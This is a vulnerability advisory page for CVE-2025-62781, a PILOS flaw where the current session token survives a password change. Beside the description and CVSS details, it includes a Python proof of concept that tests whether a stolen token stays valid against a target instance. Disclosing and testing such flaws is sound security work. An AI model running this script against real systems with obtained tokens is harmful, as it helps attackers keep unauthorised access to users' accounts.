Security Vulnerability Report
CVE-2025-62781 CVSS 5.0 MEDIUM

CVE-2025-62781

Published: 2025-10-27 22:15:42
Last Modified: 2025-11-04 18:37:23

Description

PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.8.0, users with a local account can change their password while logged in. When doing so, all other active sessions are terminated, except for the currently active one. However, the current session’s token remains valid and is not refreshed. If an attacker has previously obtained this session token through another vulnerability, changing the password will not invalidate their access. As a result, the attacker can continue to act as the user even after the password has been changed. This vulnerability is fixed in 4.8.0.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:* - VULNERABLE
PILOS < 4.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-62781 PoC - PILOS Session Fixation After Password Change

This PoC demonstrates that the session token remains valid after a
password change.
"""
import requests

TARGET_URL = "http://target-pilos-instance.com"
ATTACKER_SESSION = "attacker_obtained_session_token_here"
VICTIM_USERNAME = "[email protected]"
NEW_PASSWORD = "NewPassword123!"


def check_session_validity(session_token):
    """Check if the session token is still valid after password change."""
    headers = {
        "Cookie": f"session={session_token}",
        "Content-Type": "application/json",
    }
    response = requests.get(f"{TARGET_URL}/api/v2/users/me", headers=headers)
    return response.status_code == 200


def change_password(session_token, new_password):
    """Simulate victim changing their password."""
    headers = {
        "Cookie": f"session={session_token}",
        "Content-Type": "application/json",
    }
    data = {
        "current_password": "OldPassword123!",
        "password": new_password,
        "password_confirmation": new_password,
    }
    response = requests.post(
        f"{TARGET_URL}/api/v2/users/password", headers=headers, json=data
    )
    return response.status_code == 200


def main():
    print("[*] CVE-2025-62781 - PILOS Session Fixation Test")
    print(f"[*] Target: {TARGET_URL}")

    # Step 1: Attacker obtains session token (via XSS, MITM, etc.)
    print(f"[*] Attacker has session token: {ATTACKER_SESSION[:20]}...")

    # Step 2: Verify session is valid before password change
    print("[*] Checking session validity before password change...")
    if check_session_validity(ATTACKER_SESSION):
        print("[+] Session is valid")
    else:
        print("[-] Session is invalid")
        return

    # Step 3: Victim changes password
    print("[*] Victim changes password...")
    if change_password(ATTACKER_SESSION, NEW_PASSWORD):
        print("[+] Password changed successfully")

    # Step 4: Verify session is still valid (VULNERABILITY)
    print("[*] Checking session validity after password change...")
    if check_session_validity(ATTACKER_SESSION):
        print("[!] VULNERABLE: Session still valid after password change!")
        print("[!] Attacker can continue to impersonate victim")
    else:
        print("[+] PATCHED: Session invalidated after password change")


if __name__ == "__main__":
    main()
```

References

Weakness: CWE-613 (Insufficient Session Expiration)
Vendor Advisory: https://github.com/THM-Health/PILOS/security/advisories/GHSA-m8w5-8w3h-72wm
